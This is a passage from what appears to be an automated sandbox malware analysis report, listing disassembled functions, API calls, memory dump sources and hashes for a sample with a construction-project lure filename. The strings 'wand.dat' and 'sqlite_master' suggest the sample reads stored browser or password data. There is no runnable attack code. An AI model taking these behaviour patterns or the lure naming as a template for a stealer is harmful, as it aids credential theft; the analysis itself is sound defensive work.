                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                          • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                          • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                          Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                          • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1549203181-0
                                                                                                                          • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                          • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3550944819-0
                                                                                                                          • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                          • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                          Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$free
                                                                                                                          • String ID: g4@
                                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                                          • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                          • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                          Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                          • memset.MSVCRT ref: 0040AF18
                                                                                                                          • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1865533344-0
                                                                                                                          • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                          • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1127616056-0
                                                                                                                          • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                          • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                          Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                          • memset.MSVCRT ref: 0042FED3
                                                                                                                          • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: sqlite_master
                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                          • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                          • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                          • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                                          • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                          Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3917621476-0
                                                                                                                          • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                          • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                          • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                                          • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                          Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 822687973-0
                                                                                                                          • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                          • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                          • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                                          • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2605342592-0
                                                                                                                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                          • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2678498856-0
                                                                                                                          • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                          • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                          Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Item
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3888421826-0
                                                                                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                          Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3727323765-0
                                                                                                                          • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                          • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                          • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
